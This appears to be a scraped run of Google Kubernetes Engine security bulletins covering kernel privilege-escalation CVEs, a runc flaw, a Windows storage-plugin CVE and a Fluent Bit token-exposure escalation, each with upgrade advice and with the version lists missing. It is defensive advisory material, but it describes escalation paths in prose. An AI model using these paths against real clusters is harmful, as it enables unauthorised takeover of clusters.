GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-017
Published: 2024-03-06
Reference:
CVE-2023-3611
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-014
Published: 2024-02-26
Reference:
CVE-2023-3776
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-013
Published: 2024-02-23
Reference:
CVE-2023-3610
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-012
Published: 2024-02-20
Reference:
CVE-2024-0193
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-011
Published: 2024-02-15
Reference:
CVE-2023-6932
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes:
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-010
Published: 2024-02-14
Updated: 2024-04-17
Reference:
CVE-2023-6931
2024-04-17 Update: Added patch versions for GKE on VMware.
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-04-17
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?2024-04-17 Update: Added patch versions for GKE on VMware. The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
|
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-008
Published: 2024-02-12
Reference: CVE-2023-5528
GKE
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE Standard clusters running Windows Server nodes and using an in-tree storage plugin might be affected. GKE Autopilot clusters and GKE node pools using GKE Sandbox are not affected because they do not support Windows Server nodes. What should I do?Determine if you have Windows Server nodes in use on your clusters: kubectl get nodes -l kubernetes.io/os=windows Check audit logs for evidence of exploitation. Kubernetes audit logs can be audited to determine if this vulnerability is being exploited. Persistent Volume create events with local path fields containing special characters are a strong indication of exploitation. Update your GKE cluster and node pools to a patched version. The following versions of GKE have been updated to fix this vulnerability. Even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and Windows Server node pools to one of the following GKE versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. What vulnerabilities are addressed by this patch?CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. |
High |
GKE on VMware
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on VMware clusters running Windows Server nodes and using an in-tree storage plugin might be affected. What should I do?Determine if you have Windows Server nodes in use on your clusters: kubectl get nodes -l kubernetes.io/os=windows Check audit logs for evidence of exploitation. Kubernetes audit logs can be audited to determine if this vulnerability is being exploited. Persistent Volume create events with local path fields containing special characters are a strong indication of exploitation. Update your GKE on VMware cluster and node pools to a patched version. The following versions of GKE on VMware have been updated to fix this vulnerability. Even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and Windows Server node pools to one of the following GKE on VMware versions or later:
What vulnerabilities are addressed by this patch?CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. |
High |
GKE on AWS
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on AWS clusters aren't affected. What should I do?No action required |
None |
GKE on Azure
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on Azure clusters aren't affected. What should I do?No action required |
None |
GKE on Bare Metal
Description | Severity |
---|---|
CVE-2023-5528 allows an attacker to create pods and persistent volumes on Windows nodes in a way that enables admin privilege escalation on those nodes. GKE on Bare Metal clusters aren't affected. What should I do?No action required |
None |
GCP-2024-005
Published: 2024-01-31
Updated: 2024-05-06
Reference: CVE-2024-21626
2024-05-06 Update: Added patch versions for GKE on AWS and GKE on Azure.
2024-04-02 Update: Added patch versions for GKE on Bare Metal
2024-03-06 Update: Added patch versions for GKE on VMware
2024-02-28 Update: Added patch versions for Ubuntu
2024-02-15 Update: Clarified that the 1.25 and 1.26 Ubuntu patch versions in the
2024-02-14 update might cause unhealthy nodes.
2024-02-14 Update: Added patch versions for Ubuntu
2024-02-06 Update: Added patch versions for Container-Optimized OS.
GKE
Updated: 2024-03-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?2024-02-28 Update: The following versions of GKE have been updated with code to fix this vulnerability in Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
2024-02-15 Update: Due to an issue, the following Ubuntu patch versions from the 2024-02-14 update might cause your nodes to enter an unhealthy state. Don't upgrade to the following patch versions. We'll update this bulletin when newer patch versions for Ubuntu are available for 1.25 and 1.26.
If you already upgraded to one of these patch versions, manually downgrade your node pool to an earlier version in your release channel. 2024-02-14 Update: The following versions of GKE have been updated with code to fix this vulnerability in Ubuntu. Upgrade your Ubuntu node pools to one of the following patch versions or later:
2024-02-06 Update: The following versions of GKE have been updated with code to fix this vulnerability in Container-Optimized OS. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and Container-Optimized OS node pools to one of the following GKE versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. We're updating GKE with code to fix this vulnerability. We'll update this bulletin when patch versions are available. What vulnerabilities are addressed by this patch?
|
High |
GKE on VMware
Updated: 2024-03-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in What should I do?2024-03-06 Update: The following versions of GKE on VMware have been updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
Patch versions and a severity assessment for GKE on VMware are in progress. We'll update this bulletin with that information when it's available. What vulnerabilities are addressed by this patch?
|
High |
GKE on AWS
Updated: 2024-05-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in What should I do?2024-05-06 Update: The following versions of GKE on AWS have been updated with patches for CVE-2024-21626:
Patch versions and a severity assessment for GKE on AWS are in progress. We'll update this bulletin with that information when it's available. What vulnerabilities are addressed by this patch?
|
High |
GKE on Azure
Updated: 2024-05-06
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in What should I do?2024-05-06 Update: The following versions of GKE on Azure have been updated with patches for CVE-2024-21626:
Patch versions and a severity assessment for GKE on Azure are in progress. We'll update this bulletin with that information when it's available. What vulnerabilities are addressed by this patch?
|
High |
GKE on Bare Metal
Updated: 2024-04-02
Description | Severity |
---|---|
A security vulnerability, CVE-2024-21626, has been discovered in What should I do?2024-04-02 Update: The following versions of GKE on Bare Metal have been updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later:
Patch versions and a severity assessment for GKE on Bare Metal are in progress. We'll update this bulletin with that information when it's available. What vulnerabilities are addressed by this patch?
|
High |
GCP-2024-004
Published: 2024-01-24
Updated: 2024-02-07
Reference:
CVE-2023-6817
2024-02-07 Update: Added patch versions for Ubuntu.
GKE
Updated: 2024-02-07
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?2024-02-07 Update: The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2024-003
Published: 2024-01-19
Updated: 2024-01-26
2024-01-26 Update: Clarified the number of affected clusters and the actions that
we took to help mitigate the impact.
GKE
Updated: 2024-01-26
Description | Severity |
---|---|
2024-01-26 Update: Security research that found a small number of
GKE clusters with a customer-created misconfiguration involving
the We have identified several clusters where users have granted Kubernetes
privileges to the Recently, a security researcher reported findings of clusters with RBAC misconfigurations through our vulnerability reporting program. Google's approach to authentication is to make authenticating to Google Cloud and
GKE as simple and secure as possible without adding complex configuration steps.
Authentication just tells us who the user is; Authorization is
where access is determined. So the With this in mind we've taken several steps to reduce the risk of users
making authorization errors with the Kubernetes built-in users and
groups, including To protect users from accidental authorization errors with these system users/groups, we have:
Clusters that apply authorized
networks restrictions have a first layer of defense: they cannot be attacked
directly from the Internet. But we still recommend removing these bindings for
defense in depth and to guard against errors in network controls. We are investigating ways we can further protect against user RBAC misconfiguration with these system users/groups through prevention and detection. What should I do?To prevent any new bindings of Existing bindings should be reviewed following this guidance. |
Medium |
GKE on VMware
No updates at this time.
GKE on AWS
No updates at this time.
GKE on Azure
No updates at this time.
GKE on Bare Metal
No updates at this time.
GCP-2024-002
Published: 2024-01-17
Updated: 2024-02-20
Reference:
CVE-2023-6111
2024-02-20 Update: Added patch versions for GKE on VMware.
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Updated: 2024-02-20
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do?2024-02-20 Update: The following versions of GKE on VMware are updated with code to fix this vulnerability. Upgrade your clusters to the following versions or later: 1.28.100 |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-051
Published: 2023-12-28
Reference:
CVE-2023-3609
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE Autopilot clusters in the default configuration are not impacted, but might be vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-050
Published: 2023-12-27
Reference:
CVE-2023-3389
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-049
Published: 2023-12-20
Reference:
CVE-2023-3090
GKE
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
GKE Standard clusters are impacted. GKE
Autopilot clusters in the default configuration are not impacted, but might be
vulnerable if you explicitly set the seccomp Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-048
Published: 2023-12-15
Updated: 2023-12-21
Reference:
CVE-2023-3390
2023-12-21 Update: Clarify that GKE Autopilot clusters in the default configuration are not impacted.
GKE
Updated: 2023-12-21
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
2023-12-21 Update: The original bulletin stated Autopilot
clusters are impacted, but this was incorrect. GKE Autopilot
clusters in the default configuration are not impacted, but might be vulnerable if you
explicitly set the seccomp Unconfined profile or
allow GKE Standard and Autopilot clusters are impacted. Clusters using GKE Sandbox aren't impacted. What should I do?The following minor versions are affected. Upgrade your Container-Optimized OS node pools to one of the following patch versions or later:
The following minor versions are affected. Upgrade your Ubuntu node pools to one of the following patch versions or later:
You can apply patch versions from newer release channels if your cluster runs the same minor version in its own release channel. This feature lets you secure your nodes until the patch version becomes the default in your release channel. For details, see Run patch versions from a newer channel. |
High |
GKE on VMware
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on AWS
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Azure
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do? |
Pending |
GKE on Bare Metal
Description | Severity |
---|---|
The following vulnerabilities were discovered in the Linux kernel that can lead to a privilege escalation on Container-Optimized OS and Ubuntu nodes.
What should I do?There is no action required. GKE on Bare Metal isn't affected as it does not bundle an operating system in its distribution. |
None |
GCP-2023-047
Published: 2023-12-14
GKE
Description | Severity |
---|---|
An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Cloud Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster. The issues with Fluent Bit and Cloud Service Mesh have been mitigated and fixes are now available. These vulnerabilities are not exploitable on their own in GKE and require an initial compromise. We are not aware of any instances of exploitation of these vulnerabilities. These issues were reported through our Vulnerability Reward Program. What should I do?The following versions of GKE have been updated with code to fix these vulnerabilities in Fluent Bit and for users of managed Cloud Service Mesh. For security purposes, even if you have node auto-upgrade enabled, we recommend that you manually upgrade your cluster and node pools to one of the following GKE versions or later:
A recent feature of release channels allows you to apply a patch without having to unsubscribe from a channel. This lets you secure your nodes until the new version becomes the default for your specific release channel If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are being addressed by this patch? The vulnerabilities addressed by this bulletin require an attacker to compromise the Fluent Bit logging container. We are not aware of any existing vulnerabilities in Fluent Bit that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future GKE uses Fluent Bit to process logs for workloads running on clusters. Fluent Bit on GKE was also configured to collect logs for Cloud Run workloads. The volume mount configured to collect those logs gave Fluent Bit access to Kubernetes service account tokens for other Pods running on the node. The researcher used this access to discover a highly privileged service account token for clusters that have Cloud Service Mesh enabled. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges We have removed Fluent Bit's access to the service account tokens and have redesigned the functionality of Cloud Service Mesh to remove excess privileges. |
Medium |
GKE on VMware
Description | Severity |
---|---|
Only GKE on VMware clusters using Cloud Service Mesh are affected. What should I do?If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GKE on AWS
Description | Severity |
---|---|
Only GKE on AWS clusters using Cloud Service Mesh are affected. What should I do?If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
GKE on Azure
Description | Severity |
---|---|
Only GKE on Azure clusters using Cloud Service Mesh are affected. What should I do?If your cluster uses in-cluster Cloud Service Mesh, you must manually upgrade to one of the following versions (release notes):
What vulnerabilities are addressed by this patch?The vulnerabilities addressed by this bulletin require an attacker to first either compromise or otherwise break out of a container or have root on a cluster Node. We are not aware of any existing vulnerabilities that would lead to this prerequisite condition for privilege escalation. We have patched these vulnerabilities as hardening measures to prevent a potential full attack chain in the future. Cloud Service Mesh required high privileges to make necessary modifications to a cluster's configuration including the ability to create and delete Pods. The researcher used Cloud Service Mesh's privileged Kubernetes service account token to escalate their initial compromised privileges by creating a new pod with cluster-admin privileges. We have redesigned the functionality of Cloud Service Mesh to remove excessive privileges. |
Medium |
